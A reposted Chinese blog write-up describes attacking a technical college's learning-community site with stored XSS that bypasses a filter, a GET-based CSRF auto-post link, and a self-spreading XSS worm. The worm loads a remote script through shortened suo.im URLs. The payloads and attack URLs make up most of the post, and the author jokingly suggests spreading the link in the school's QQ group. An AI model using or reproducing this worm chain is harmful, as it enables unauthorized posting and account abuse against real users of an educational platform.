0x00 存储XSS
1) 可绕过的XSS
给大家分享个漏洞案例,今天上午刚把电脑修好
某技术学院储存XSS+CSRF(XSS绕过滤到蠕虫攻击)
注册处:
http://xxx.edu.cn/meol/xxxx
需要注册才能进入社区发表,先说下储存XSS,过滤了,发现可绕过
储存XSS:
http://xxx.edu.cn/meol/xxx?genre=80&type=0
他是先过滤再输出,而不是输出时过滤,从而导致可绕过
我们发现他输入时就进行了过滤,直接替换
<script>alert('XSS')</script>
成功弹框:
0x01 CSRF配合XSS蠕虫
同样是这个位置,发表话题,改成get请求
得到连接:
CSRF:
http://xxx.edu.cn/meol/xxx?type=&studyCircleId=&saytext=%B9%FE%B9%FE
点击链接会自动发表内容
我们缩短一下链接 网上有在线缩短的,缩短后链接http://suo.im/abc
构造一下csrf连接:
<script src=http://suo.im/abc></script>
(插入到网页当中,当别人访问你的个人中心,会自动发表一个内容)
接着我们继续构造,找到CSRF漏洞处,把后面的内容替换为CSRF链接,也就是访问此连接会自动发表内容
http://xxx.edu.cn/meol/xxx?type=0&studyCircleId=&saytext=<script src=http://suo.im/xxx></script>
继续缩短网址:
缩短后:http://suo.im/XXXX
这个时候我们再调用一下CSRF+XSS的地址:
<script src=http://suo.im/XXXX></script>
把这个链接插入到网页当中即可完成XSS蠕虫攻击
当A访问你的主页时,A会发表和你一样的内容,当B访问A的主页时,B会发表和A一样的内容,同理,完成XSS蠕虫攻击
最后的思路就是自己构造个网站,加这个学校的QQ群,发送链接哈哈。
对网安感兴趣的关注下公众号吧~标签:XSS,http,CSRF,xxx,蠕虫,链接 来源: https://www.cnblogs.com/XunanSec/p/xss_csrf.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。